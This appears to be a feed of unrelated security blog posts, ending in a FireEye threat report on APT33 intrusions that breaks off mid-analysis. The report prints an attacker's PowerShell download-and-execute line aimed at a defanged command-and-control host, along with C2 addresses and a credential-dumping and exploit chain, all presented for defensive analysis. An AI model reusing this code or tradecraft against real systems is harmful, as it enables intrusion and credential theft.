As you can see, you have a lot of granularity in how you deploy the guardrails. But stay focused on getting quick wins up front, so don’t try to boil the ocean and implement every conceivable guardrail on Day 1. Focus on the most sensitive data and establish and refine the exception handling process. Then systematically add more guardrails as the process matures and you learn what has the most impact on reducing attack surface.

Refining Data Behavioral Analytics

Once the guardrails are in place, you have a baseline of data security implemented. You can be confident that scads of data won’t be extracted and copied, and that unauthorized groups won’t access data they shouldn’t. By establishing authorized activities, and stopping things that aren’t specifically authorized, a large part of the attack surface is eliminated.

That being said, authorized users can create a lot of damage either maliciously or accidentally. Behavioral analytics steps in where guardrails end by reducing the risks of negative activities that fall outside of the pre-defined rules. Thus, we want to pair data guardrails with an analysis of data usage to identify patterns of typical use and then look for non-normal data usage and behavior. This requires telemetry, analysis and tuning. Let’s use unstructured data as the means to describe the approach.

Getting back to our pharma example, the cloud storage provider tracks who does what to every bit of data in their environment. This telemetry becomes the basis of their Data Behavioral Analytics program. In order to accurately train the analytics model, they need data on not just known-good activity, but also activity that they know violates the policies. Keep in mind the importance of data quality, as opposed to mere data quantity. When building your own program, make sure to gather data on user context and entitlements, so you can track how the data has been used, when, and by which user populations.

Of course, you could just look for anomalous patterns on all of the telemetry, but that can create a lot of noise. So we recommend you start by identifying a type of behavior you want to detect. For instance, mass exfiltration of clinical trial data. So you’d identify which specific files/folders have that data, and look at the different patterns of activity. A quick analysis shows that a group of researchers in Asia have been accessing those folders, but at non-working hours in their local geography. That raises an alarm and causes you to investigate. It turns out that one of the researchers collaborates with another team in Europe, and thus has been working non-standard hours, resulting in the anomalous data access. In this case it’s legitimate, but this approach both alerts you to potential misuse, and also sends the message that the security team looks for this kind of activity as a bit of a deterrent.
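This off-hours pattern is one of the simplest behavioral baselines you can build from telemetry: record which hours each user normally accesses the data, then flag accesses that fall outside that profile. A toy sketch (the field names are hypothetical, and real products model far richer features than hour-of-day):

```python
from collections import defaultdict

def build_baseline(events):
    """Map each user to the set of hours (0-23) they normally access data."""
    hours = defaultdict(set)
    for e in events:
        hours[e["user"]].add(e["hour"])
    return hours

def flag_anomalies(baseline, new_events):
    """Return events occurring at hours never before seen for that user."""
    return [e for e in new_events
            if e["hour"] not in baseline.get(e["user"], set())]
```

In the scenario above, the Asia-based researcher's 3 a.m. accesses would be flagged because that hour never appears in her baseline; the investigation, not the model, then decides whether it is legitimate.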

If you use an off-the-shelf product, much of this may be defined for you as starting points. Clusters of user activity based on groups, social graphs, hours and locations, and similar pattern feeds tend to be useful in a wide range of behavioral analytics use cases. You will likely still want to tune these over time to more refined use cases that reflect your own organization’s needs and patterns.

As with any analytical technique, tuning will be required over time as things change in your environment and impact the accuracy and relevance of the analytics. So we’ll reiterate the importance of sufficiently staffing your program to manage the alerts and ensure the thresholds walk that fine line between signal and noise.

Between the data guardrails to handle known risks and enforce authorized use policies and the data behavioral analytics to detect situations you couldn’t have predicted or malicious activity, leveraging these new approaches brings data security into the modern age.

As always, we’ll be factoring in comments and feedback on the blog series, so if you see something you don’t like or don’t agree with, let us know. We’ll be refining the content and packaging it up into a white paper, which will appear in the research library within a couple of weeks.

- Mike Rothman

OODA: Observe Orient Decide Act Faster Than Your Adversaries

OODA is the famous fast-paced decision-making model that emphasizes out-thinking your adversaries. First captured by Colonel John Boyd to articulate fighter pilot success models, it has been applied to international business, cyber security and just about any competitive environment.

Applying OODA methodologies to your business can help accelerate your products to market and help you beat the competition. This is especially important in the age of ubiquitous computing we all find ourselves in.

OODA is also the name of a new consultancy designed to optimize your actions.

The consultancy OODA helps clients identify, manage, and respond to global risks and uncertainties while exploring emerging opportunities and developing robust and adaptive strategies for the future.

OODA is composed of a unique team of international experts led by co-founders Matt Devost and Bob Gourley. Matt and Bob have been collaborating for two decades on advanced technology, intelligence, and security issues. Our team is capable of providing advanced intelligence and analysis, strategy and planning support, investment and due diligence, risk and threat management, training, decision support, crisis response, and security services to global corporations and governments.


The post OODA: Observe Orient Decide Act Faster Than Your Adversaries appeared first on The Cyber Threat.

Why your cloud business needs FedRAMP certification

Now more than ever, FedRAMP certification will put your cloud services or SaaS solution head and shoulders above the competition. The Federal Risk and Authorization Management Program, or FedRAMP, was designed to support the federal government’s “cloud-first” initiative by making it easier for federal agencies to contract with vendors that provide SaaS solutions and other…


Arizona Rush to Adopt Driverless Cars Devolves Into Pedestrian War

Look, I’m not saying I have predicted this exact combat scenario for several years as described in my presentations (and sadly it also was my Kiwicon talk proposal for this year), I’m just openly wondering at this point why Arizona’s rabidly pro-gun legislators didn’t argue driverless cars are protected by Waymo’s 2nd Amendment right to …

Alert Traffic Patrolman Unveils Romanian Skimming Ring

Clinton, Mississippi doesn't sound like the kind of place where an international skimming operation would be operating.  With a population of barely 25,000, the town in southwest Mississippi does have one thing that helped - an alert police dispatcher.

Cheatham County, Tennessee, on the west side of Nashville, also doesn't seem like a cyber crime Metropolis.  But they also had something critical to this type of police work.  An alert traffic cop, Cheatham County Deputy Paul Ivy.

Clinton is more than a six-hour drive from where a Cheatham County Sheriff's deputy pulled over a suspicious vehicle on December 12th as it was about to pull onto Interstate 40 headed west.  The deputy had seen the 2005 Chevy Trailblazer parked at a Shell gas station and noticed a temporary license tag displayed in an unreadable manner behind a tinted windshield.  The driver, Forrest Beard, showed the officer a Mississippi driver's license, which came back as suspended.  Beard's account of the two other occupants of the car seemed odd: "Mike," whom he had met at a party four months ago, and another man he had known for only a couple of weeks.  He consented to a vehicle search, which revealed "a large amount of money", a credit card terminal, two laptops, credit card skimmers, and a stack of 159 Walmart gift cards.  Most of the materials were hidden in Nike shoe boxes.

Vehicle search items discovered
Labels added to the photo by Security Researcher Silas Cutler

The other two men in the car had unusual forms of identification for Kingston Springs, Tennessee.  George Zica was from Romania, according to his passport.

George Zica (Cheatham County Sheriff's Office)
Madalin Palanga (Cheatham County Sheriff's Office)
Madalin "Mike" Palanga was also from Romania, but the id he was carrying was a counterfeit Czech Republic identity card in the name of Vaclav Kubisov.

The officer contacted the Secret Service, which ended up keeping the vehicle, the money, the computers, and all three men's cell phones.  On Wednesday, December 19th, a judge posted a bail order for the men, and Madalin bonded out for $74,999 (though he is wearing a GPS-tracking ankle bracelet) before a hold order was received from Mississippi, preventing the other two men from doing the same.

Further investigation revealed that the men had been tied to skimming cases across middle Tennessee, as well as in North Carolina and South Carolina, but Mississippi added one critical piece of evidence, courtesy of ATM footage from Regions Bank.  On Tuesday, Regions Bank employees contacted the Clinton, Mississippi police to let them know they had "trapped" some cards in the local Regions ATM.  When Regions receives fraud reports indicating one of their accounts has been compromised, their policy is to capture any ATM card put into one of their ATMs that uses that account information.

In this case, the captured cards were both Walmart gift cards.  The skimmers were "Verifone" terminal overlays, commonly found in many gas stations and convenience stores at the counter.  After criminals modify the keypad by installing a skimmer, a device placed in front of the card slot makes a copy of the magnetic stripe, while the fake keypad overlay captures the PIN when the customer puts in their four-digit code.  The information can be retrieved wirelessly from a vehicle in the parking lot.

(Video from Andy Cordan, WKRN TV News)

In Clinton, Mississippi, over $13,000 in fraudulent ATM charges had been reported recently, with most of the stolen card data being tracked to customers in the Memphis, Tennessee area.

Regions Bank provided ATM Surveillance camera footage to the Clinton police.  An alert police dispatcher who was reviewing the material started comparing the image to other recent credit card crimes in the South East and determined that the man in the ATM footage was George Zica, who was arrested later that week in Tennessee as described above.  (The timestamp on the video is confusing.)

126 Arrests: The Emergence of India’s Cyber Crime Detectives Fighting Call Center Scams

The Times of India reports that police have raided a call center in Noida Sector 63 where hundreds of fraud calls were placed every day to Americans and Canadians resulting in the theft of $50,000 per day.

The operation occupied four rented floors of a building and was run by two scammers from Gurgaon, Narendra Pahuja and Jimmy Ashija. Their boss, who was not named by the police, allegedly operates at least five call centers. In the raid this week, 126 employees were arrested and police seized 312 workstations, as well as Rs 20 lakh in cash (about $28,500 USD).

Times of India photo 

Noida police have been cooperating very well with international authorities, as well as Microsoft, leading to more than 200 people arrested in Noida and "scores" of fake call centers shut down, including four in Sector 63.  (In a case just last month, another call center was said to have stolen from 300 victims after using online job sites to recruit young money seekers and having them conduct the scams.)

In the current scam, callers already had possession of the victim's Social Security Number and full name.  This information was used to add authority to their request, which got really shady really fast.  The victim was instructed to purchase Apple iTunes Gift Cards, or Google Play Gift Cards, scratch the numbers, and read them to the call center employee.  The money was laundered through a variety of businesses in China and India before cashing out to bank accounts belonging to Pahuja and Ashija.

Noida police are advancing in their Cyber Crime skills!

As more and more cyber crime enterprises spring up in India, the assistance of their new Centers for Cyber Crime Investigation is becoming more critical to stopping fraud against Americans:

We applaud the Center for Cyber Crime Investigation in Noida

The US Embassy was quick to acknowledge the support of the newest cyber crime partners of the United States after their action at the end of November:

US Embassy to India thanks the Noida and Gurgaon Police for their help!
Another recent Times of India story from November 30, 2018, "Bogus Call Centres and Pop-up Virus Alerts - a Global Cyber Con Spun up in NCR" [NCR = National Capital Region] had more details of this trend, including this graphic:

That's at least 50 call centers shut down just in these two regions, with this week's 126 arrests being the culmination of an ongoing investigation that received data from both the FBI and Microsoft.

Local news of India reported the names of some of the gang members held in the November 29-30th action in their story नोएडा: बड़ी कंपनियों में नौकरी दिलाने के नाम पर करते थे धोखाधड़ी, 8 गिरफ्तार (Noida: Fraud, 8 arrested for giving fake jobs in the name of big companies).

Sontosh Gupta, who was the ring leader, was previously employed by an online job site, but then created his own site, vintechjobs (dot) com, which he used to attract call center employees, many of whom were duped into serving as his scammer army without ever being compensated for their work!

Others arrested then included Mohan Kumar, Paritosh Kumar, Jitendra Kumar, Victor, Himanshu, Ashish Jawla, and Jaswinder.

During that same two-day raid, police swept through at least sixteen other call centers, according to this New York Times story, "That Virus Alert on Your Computer? Scammers in India May Be Behind It."

Ajay Pal Sharma, the senior superintendent of police, told the NYT that 50 of his officers swept through eight different call centers in Gautam Budh Nagar as part of the case.  Microsoft's Digital Crimes Unit told the Times that with 1.2 million people in India working for call centers and generating $28 billion, it isn't hard to disguise the shady callers among the legitimate businesses.

The problem is not unique to Delhi and the National Capital Region suburbs that are the current focus.  Back in July, Mumbai was in the headlines, as a massive IRS-imitating Call Center ring was broken up with the help of more great cyber crime investigators from India:

Madan Ballal, Thane Crime Branch, outside Mumbai
Police Inspector Madan Ballal had his story told as the focus of an article in Narratively, "This Indian Cop Took Down a Massive IRS Call-Center Scam".

Much more investigating and arresting needs to be done, but it is a great sign that the problem is now receiving help from an emerging new generation of Indian Cybercrime Detectives!

The #1 Gift Parents Can Give Their Kids This Christmas

You won’t see this gift making the morning shows as being among the top hot gifts of 2018. It won’t make your child’s wish list, and you definitely won’t have to fight through mall crowds to try to find it.

Even so, it is one of the most meaningful gifts you can give your child this year. It’s the gift of your time.

If we are honest, as parents, we know we need to be giving more of this gift every day. We know in our parenting “knower” that if we were to calculate the time we spend on our phones, it would add up to days — precious days — that we could be spending with our kids.

So this holiday season, consider putting aside your phone and leaning into your family connections. Try leaving your phone in a drawer or in another room. And, if you pick it up to snap a few pictures, return it to its hiding place and reconnect to the moment.

This truism from researchers is worth repeating: Too much screen time can chip away at our relationships. And for kids? We’ve learned too much tech can lead to poor grades, anxiety, obesity, and worse — feelings of hopelessness and depression.

Putting the oodles of knowledge we now have into action and transforming the family dynamic is also one of the most priceless gifts you can give yourself this year.

Here are a few ideas to inspire you forward:

  1. Take time seriously. What if we took quality time with family as seriously as we do other things? What if we booked time with our family and refused to cancel it? It’s likely our dearest relationships would soon reflect the shift. Get intentional by carving out time. Things that are important end up on the calendar, so plan time together by booking it on the family calendar. Schedule time to play, make a meal together, do a family project, or hang out and talk.
  2. Green time over screen time. Sure, it’s fun to have family movie marathons over the break, but make sure you get your green time in. Because screen time can physically deplete our senses, green time — time spent outdoors — can be a great way to increase quality time with your family and get a hefty dose of Vitamin D.
  3. Aim for balance. The secret sauce of making any kind of change is balance. If there’s too much attention toward technology this holiday (yours or theirs), try a tech-exchange by trading a half-day of tech use for a half-day hike or bike ride, an hour of video games for an hour of family time. Balance wins every time, especially when quality time is the goal.
  4. Balance new gadget use. Be it a first smartphone, a new video game, or any other new tech gadget, let your kids have fun but don’t allow them to isolate and pull away from family. Balance screen time with face-to-face time with family and friends to get the most out of the holidays. Better yet: Join them in their world — grab a controller and play a few video games or challenge them to a few Fortnite battles.
  5. Be okay with the mess. When you are a parent, you know better than most how quickly the days, months, and years can slip by until — poof! — the kids are grown and gone. The next time you want to spend a full Saturday on chores, think about stepping over the mess and getting out of the house for some fun with your kids.

Here’s hoping you and your family have a magical holiday season brimming with quality time, laughter, and beautiful memories — together.

The post The #1 Gift Parents Can Give Their Kids This Christmas appeared first on McAfee Blogs.

Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat

As the Internet of Things works its way into almost every facet of our daily lives, it becomes more important to safeguard the IoT devices we bring into our homes. One device that has become increasingly popular among consumers is the drone. These remote-controlled quadcopters have enhanced the work of photographers and given technology buffs a new hobby, but what happens when these flying robots cause a safety hazard for others? That’s exactly what happened at the Gatwick airport on Wednesday night and again today when two drones were spotted flying over the airfield, causing all departing flights to remain grounded and all arriving flights to be diverted to other airports.

The drones were spotted flying over the Gatwick airport’s perimeter fence into the area where the runway operates from. This disruption affected 10,000 passengers on Wednesday night, 110,000 passengers on Thursday, and 760 flights expected to arrive and depart on Thursday. More than 20 police units were recruited to find the drones’ operator so the devices could be disabled. The airport closure resulted in 31.9 hours with no planes taking off or landing between Wednesday and Thursday.

You might be wondering, how could two drones cause an entire airport to shut down for so long? It turns out that drones can cause serious damage to an aircraft. Evidence suggests that drones could inflict more damage than a bird collision and that the lithium-ion batteries that power drones could become lodged in airframes, potentially starting a fire. And while the probability of a collision is small, a drone could still be drawn into an aircraft turbine, putting everyone on board at risk. This is why it’s illegal to fly a drone within one kilometer of an airport or airfield boundary. What’s more, endangering the safety of an aircraft is a criminal offense that could result in a five-year prison sentence.

Now, this is a lesson for all drone owners everywhere to be cognizant of where they fly their devices. But beyond the physical implications that are associated with these devices, there are digital ones too — given they’re internet-connected. In fact, to learn about how vulnerable these devices can be, you can give our latest episode of “Hackable?” a listen, which explores the physical and digital implications of compromised drones.

Therefore, if you get a drone for Christmas this year, remember to follow these cybersecurity tips to protect it on the digital front:

  • Do your research. There are multiple online communities that disclose bugs and potential vulnerabilities as well as new security patches for different types of drones. Make sure you stay informed to help you avoid potential hacks.
  • Update, update, update! Just as it’s important to update your apps and mobile devices, it’s also important to update the firmware and software for your drone. Always verify the latest updates on your drone manufacturer’s website to make sure they are legitimate.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Rogue Drones Cause Gatwick Airport to Close for Over 30 Hours: More on This Threat appeared first on McAfee Blogs.

Managing Burnout

This is not strictly an information security post, but the topic likely affects a decent proportion of my readership.

Within the last few years I experienced a profound professional "burnout." I've privately mentioned this to colleagues in the industry, and heard similar stories or requests for advice on how to handle burnout.

I want to share my story in the hopes that it helps others in the security scene, either by coping with existing burnout or preparing for a possible burnout.

How did burnout manifest for me? It began with FireEye's acquisition of Mandiant, almost exactly five years ago. 2013 was a big year for Mandiant, starting with the APT1 report in early 2013 and concluding with the acquisition in December.

The prospect of becoming part of a Silicon Valley software company initially seemed exciting, because we would presumably have greater resources to battle intruders. Soon, however, I found myself at odds with FireEye's culture and managerial habits, and I wondered what I was doing inside such a different company.

(It's important to note that the appointment of Kevin Mandia as CEO in June 2016 began a cultural and managerial shift. I give Kevin and his lieutenants credit for helping transform the company since then. Kevin's appointment was too late for me, but I applaud the work he has done over the last few years.)

Starting in late 2014 and progressing in 2015, I became less interested in security. I was aggravated every time I saw the same old topics arise in social or public media. I did not see the point of continuing to debate issues which were never solved. I was demoralized and frustrated.

At this time I was also working on my PhD with King's College London. I had added this stress myself, but I felt like I could manage it. I had earned two major and two minor degrees in four years as an Air Force Academy cadet. Surely I could write a thesis!

Late in 2015 I realized that I needed to balance the very cerebral art of information security with a more physical activity. I took a Krav Maga class the first week of January 2016. It was invigorating and I began a new blog, Rejoining the Tao, that month. I began to consider options outside of information security.

In early 2016 my wife began considering ways to rejoin the W-2 workforce, after having stayed home with our kids for 12 years. We discussed the possibility of me leaving my W-2 job and taking a primary role with the kids. By mid-2016 she had a new job and I was open to departing FireEye.

By late 2016 I also realized that I was not cut out to be a PhD candidate. Although I had written several books, I did not have the right mindset or attitude to continue writing my thesis. After two years I quit my PhD program. This was the first time I had quit anything significant in my life, and it was the right decision for me. (The Churchill "never, never, never give up" speech is fine advice when defending your nation's existence, but it's stupid advice if you're not happy with the path you're following.)

In March 2017 I posted Bejtlich Moves On, where I said I was leaving FireEye. I would offer security consulting in the short term, and would open a Krav Maga school in the long-term. This was my break with the security community and I was happy to make it. I blogged on security only five more times in 2017.

(Incidentally, one very public metric for my burnout experience can be seen in my blog output. In 2015 I posted 55 articles, but in 2016 I posted only 8, and slightly more, 12, in 2017. This is my 21st post of 2018.)

I basically took a year off from information security. I did some limited consulting, but Mrs B paid the bills, with some support from my book royalties. This break had a very positive effect on my mental health. I stayed aware of security developments through Twitter, but I refused to speak to reporters and did not entertain job offers.

During this period I decided that I did not want to open a Krav Maga school and quit my school's instructor development program. For the second time, I had quit something I had once considered very important.

I started a new project, though -- writing a book that had nothing to do with information security. I will post about it shortly, as I am finalizing the cover with the layout team this weekend!

By the spring of 2018 I was able to consider returning to security. In May I blogged that I was joining Splunk, but that lasted only two months. I realized I had walked into another cultural and managerial mismatch. Near the end of that period, Seth Hall from Corelight contacted me, and by July 20th I was working there. We kept it quiet until September. I have been very happy at Corelight, finally finding an environment that matches my temperament, values, and interests.

My advice to those of you who have made it this far:

If you're feeling burnout now, you're not alone. It happens. We work in a stressful industry that will take everything that you can give, and then try to take more. It's healthy and beneficial to push back. If you can, take a break, even if it means only a partial break.

Even if you can't take a break, consider integrating non-security activities into your lifestyle -- the more physical, the better. Security is a very cerebral activity, often performed in a sedentary manner. You have a body and taking care of it will make your mind happier too.

If you're not feeling burnout now, I recommend preparing for a possible burnout in the future. In addition to the advice in the previous paragraphs, take steps now to be able to completely step away from security for a defined period. Save a proportion of your income to pay your bills when you're not working in security. I recommend at least a month, but up to six months if you can manage it.

This is good financial advice anyway, in the event you were to lose your job. This is not an emergency fund, though -- this is a planned reprieve from burnout. We are blessed in security to make above-average salaries, so I suggest saving for retirement, saving for layoffs, and saving for burnout.

Finally, it's ok to talk to other people about this. This will likely be a private conversation. I don't see too many people saying "I'm burned out!" on Twitter or in a blog post. I only felt comfortable writing this post months after I returned to regular security work.

I'm very interested in hearing what others have to say on this topic. Replying to my Twitter announcement for the blog post is probably the easiest step. I moderate the comments here and might not get to them in a timely manner.

Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat

With the holidays rapidly approaching, many consumers are receiving order confirmation emails updating them on their online purchases for friends and family. What they don’t expect to see is an email that appears to be a purchase confirmation from the Apple App Store containing a PDF attachment of a receipt for a $30 app. This is actually a stealthy phishing email, which has been circulating on the internet, prompting users to click on a link if the transaction was unauthorized.

So how exactly does this phishing campaign work? In this case, the cybercriminals rely on the victim to be thrown off by the email stating that they purchased an app when they know that they didn’t. When the user clicks on the link in the receipt stating that the transaction was unauthorized, they are redirected to a page that looks almost identical to Apple’s legitimate Apple Account management portal. The user is prompted to enter their login credentials, only to receive a message claiming that their account has been locked for security reasons. If the user attempts to unlock their account, they are directed to a page prompting them to fill out personal details including their name, date of birth, and social security number for “account verification.”

Once the victim enters their personal and financial information, they are directed to a temporary page stating that they have been logged out to restore access to their account. The user is then directed to the legitimate Apple ID account management site, stating “this session was timed out for your security,” which only helps this attack seem extra convincing. The victim is led to believe that this process was completely normal, while the cybercriminals now have enough information to perform complete identity theft.

Although this attack does have some sneaky behaviors, there are a number of steps users can take to protect themselves from phishing scams like this one:

  • Be wary of suspicious emails. If you receive an email from an unknown source or notice that the “from” address itself seems peculiar, avoid interacting with the message altogether.
  • Go directly to the source. Be skeptical of emails claiming to be from companies asking to confirm a purchase that you don’t recognize. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Use a comprehensive security solution. It can be difficult to determine if a website, link, or file is risky or contains malicious content. Add an extra layer of security with a product like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Cybercriminals Disguised as Apple Are After Users’ Personal Data: Insights on This Threat appeared first on McAfee Blogs.

OVERRULED: Containing a Potentially Destructive Adversary


FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. Public reporting indicates this activity may be related to recent destructive attacks. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection.

On Sept. 20, 2017, FireEye Intelligence published a blog post detailing spear phishing activity targeting Energy and Aerospace industries. Recent public reporting indicated possible links between the confirmed APT33 spear phishing and destructive SHAMOON attacks; however, we were unable to independently verify this claim. FireEye’s Advanced Practices team leverages telemetry and aggressive proactive operations to maintain visibility of APT33 and their attempted intrusions against our customers. These efforts enabled us to establish an operational timeline that was consistent with multiple intrusions Managed Defense identified and contained prior to the actor completing their mission. We correlated the intrusions using an internally-developed similarity engine described below. Additionally, public discussions have also indicated that specific attacker infrastructure we observed is possibly related to the recent destructive SHAMOON attacks.

Identifying the Overlap in Threat Activity

FireEye augments our expertise with an internally-developed similarity engine to evaluate potential associations and relationships between groups and activity. Using concepts from document clustering and topic modeling literature, this engine provides a framework to calculate and discover similarities between groups of activities, and then develop investigative leads for follow-on analysis. Our engine identified similarities between a series of intrusions within the engineering industry. The near real-time results led to an in-depth comparative analysis. FireEye analyzed all available organic information from numerous intrusions and all known APT33 activity. We subsequently concluded, with medium confidence, that two specific early-phase intrusions were the work of a single group. Advanced Practices then reconstructed an operational timeline based on confirmed APT33 activity observed in the last year. We compared that to the timeline of the contained intrusions and determined there were circumstantial overlaps, including remarkable similarities in tool selection during specific timeframes. We assess with low confidence that the intrusions were conducted by APT33. This blog contains original source material only, whereas Finished Intelligence including an all-source analysis is available within our intelligence portal. To best understand the techniques employed by the adversary, it is necessary to provide background on our Managed Defense response to this activity during its 24x7 monitoring.
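FireEye has not published the engine's internals. As a rough, hypothetical illustration of the document-clustering idea, one could represent each intrusion as a sparse vector of observed tools and techniques and score pairs by cosine similarity; every name and count below is invented for the sketch:

```python
from collections import Counter
from math import sqrt

def cosine_similarity(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse feature vectors of activity."""
    dot = sum(a[k] * b[k] for k in a.keys() & b.keys())
    norm = sqrt(sum(v * v for v in a.values())) * sqrt(sum(v * v for v in b.values()))
    return dot / norm if norm else 0.0

# Hypothetical feature vectors: counts of tools/techniques seen per intrusion.
intrusion_a = Counter({"RULER.HOMEPAGE": 3, "POSHC2": 2, "POWERTON": 1})
intrusion_b = Counter({"RULER.HOMEPAGE": 2, "POSHC2": 3, "MIMIKATZ": 1})
print(round(cosine_similarity(intrusion_a, intrusion_b), 3))  # → 0.857
```

High-scoring pairs become investigative leads for an analyst, not automatic attribution, which matches the "develop investigative leads for follow-on analysis" framing above.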

Managed Defense Rapid Responses: Investigating the Attacker

In mid-November 2017, Managed Defense identified and responded to targeted threat activity at a customer within the engineering industry. The adversary leveraged stolen credentials and a publicly available tool, SensePost’s RULER, to configure a client-side mail rule crafted to download and execute a malicious payload from an adversary-controlled WebDAV server 85.206.161[.]214@443\outlook\live.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f).

The payload was an AutoIT downloader that retrieved and executed additional PowerShell from hxxps://85.206.161[.]216:8080/HomePage.htm. The follow-on PowerShell profiled the target system’s architecture, downloaded the appropriate variant of PowerSploit (MD5: c326f156657d1c41a9c387415bf779d4 or 0564706ec38d15e981f71eaf474d0ab8), and reflectively loaded PUPYRAT (MD5: 94cd86a0a4d747472c2b3f1bc3279d77 or 17587668AC577FCE0B278420B8EB72AC). The actor leveraged a publicly available exploit for CVE-2017-0213 to escalate privileges, publicly available Windows SysInternals PROCDUMP to dump the LSASS process, and publicly available MIMIKATZ to presumably steal additional credentials. Managed Defense aided the victim in containing the intrusion.

FireEye collected 168 PUPYRAT samples for comparison. While import hashes (IMPHASH) are insufficient for attribution, we found it remarkable that out of the specified sampling, the actor’s IMPHASH was found in only six samples, two of which were confirmed to belong to the threat actor observed in Managed Defense, and one of which is attributed to APT33. We also determined APT33 likely transitioned from PowerShell EMPIRE to PUPYRAT during this timeframe.
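The IMPHASH comparison itself is mechanically simple; the analytic value lies in the rarity of a shared hash across a large sampling. A minimal sketch with invented sample names and placeholder hash strings (real IMPHASH values are MD5s of a binary's import table):

```python
from collections import defaultdict

def cluster_by_imphash(pairs):
    """Group sample names by import hash. Small clusters sharing a rare
    IMPHASH are investigative leads, not attribution, as noted above."""
    clusters = defaultdict(list)
    for name, imphash in pairs:
        clusters[imphash].append(name)
    return clusters

# Hypothetical sampling of 168 PUPYRAT binaries: most share a common
# public-build IMPHASH, while six share a rarer one.
pairs = (
    [("pupyrat_%03d" % i, "common_imphash") for i in range(162)]
    + [("pupyrat_%03d" % i, "rare_imphash") for i in range(162, 168)]
)
clusters = cluster_by_imphash(pairs)
rare = [h for h, names in clusters.items() if len(names) <= 6]
print(rare)  # → ['rare_imphash']
```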

In mid-July of 2018, Managed Defense identified similar targeted threat activity focused against the same industry. The actor leveraged stolen credentials and RULER’s module that exploits CVE-2017-11774 (RULER.HOMEPAGE), modifying numerous users’ Outlook client homepages for code execution and persistence. These methods are further explored in this post in the "RULER In-The-Wild" section.

The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Managed Defense rapidly engaged and successfully contained the intrusion. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018.

During the July activity, Managed Defense observed three variations of the homepage exploit hosted at hxxp://91.235.116[.]212/index.html. One example is shown in Figure 1.

Figure 1: Attacker’s homepage exploit (CVE-2017-11774)

The main encoded payload within each exploit leveraged WMIC to conduct system profiling in order to determine the appropriate OS-dependent POSHC2 implant and dropped to disk a PowerShell script named “Media.ps1” within the user’s %LOCALAPPDATA% directory (%LOCALAPPDATA%\MediaWs\Media.ps1) as shown in Figure 2.

Figure 2: Attacker’s “Media.ps1” script

The purpose of “Media.ps1” was to decode and execute the downloaded binary payload, which was written to disk as “C:\Users\Public\Downloads\log.dat”. At a later stage, this PowerShell script would be configured to persist on the host via a registry Run key.

Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings. The implant will send a reconnaissance report via HTTP to the C2 server (hxxps://51.254.71[.]223/images/static/content/) and subsequently evaluate the response as PowerShell source code. The reconnaissance report contains the following information:

  • Username and domain
  • Computer name
  • CPU details
  • Current exe PID
  • Configured C2 server

The C2 messages are encrypted via AES using a hardcoded key and encoded with Base64. It is this POSHC2 binary that established persistence for the aforementioned “Media.ps1” PowerShell script, which then decodes and executes the POSHC2 binary upon system startup. During the identified July 2018 activity, the POSHC2 variants were configured with a kill date of July 29, 2018.
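A loose sketch of what assembling and encoding such a reconnaissance report might look like. This illustrates the described message shape only; it is not POSHC2's actual code, the field names are invented, and the AES layer applied by the real implant is deliberately omitted:

```python
import base64
import getpass
import json
import os
import platform

def build_recon_report(c2: str) -> dict:
    # Fields mirror the reconnaissance report described above
    # (username/domain, computer name, CPU details, current PID, C2).
    return {
        "user": getpass.getuser(),
        "computer": platform.node(),
        "cpu": platform.processor(),
        "pid": os.getpid(),
        "c2": c2,
    }

def encode_for_c2(report: dict) -> str:
    # The actual implant AES-encrypts the serialized report with a
    # hardcoded key before this Base64 step; encryption omitted here.
    return base64.b64encode(json.dumps(report).encode()).decode()

blob = encode_for_c2(build_recon_report("hxxps://example[.]invalid/images/static/content/"))
```

The server's PowerShell response travels the same channel in reverse: Base64-decode, AES-decrypt, then evaluate as source code.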

POSHC2 was leveraged to download and execute a new PowerShell-based implant self-named POWERTON (hxxps://185.161.209[.]172/api/info). The adversary had limited success interacting with POWERTON during this time. The actor was able to download and establish persistence for an AutoIt binary named “ClouldPackage.exe” (MD5: 46038aa5b21b940099b0db413fa62687), which was achieved via the POWERTON “persist” command. The sole functionality of “ClouldPackage.exe” was to execute the following line of PowerShell code:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential('public', 'fN^4zJp{5w#K0VUm}Z_a!QXr*]&2j8Ye'); iex $webclient.DownloadString('hxxps://185.161.209[.]172/api/default')

The purpose of this code is to retrieve “silent mode” POWERTON from the C2 server. Note the actor protected their follow-on payloads with strong credentials. Shortly after this, Managed Defense contained the intrusion.

Starting approximately three weeks later, the actor reestablished access through a successful password spray. Managed Defense immediately identified the actor deploying malicious homepages with RULER to persist on workstations. The actor made some infrastructure and tooling changes, including additional layers of obfuscation, in an attempt to avoid detection. They hosted their homepage exploit at a new C2 server (hxxp://5.79.66[.]241/index.html). At least three new variations of “index.html” were identified during this period. Two of these variations contained encoded PowerShell code written to download new OS-dependent variants of the .NET POSHC2 binaries, as seen in Figure 3.

Figure 3: OS-specific POSHC2 Downloader

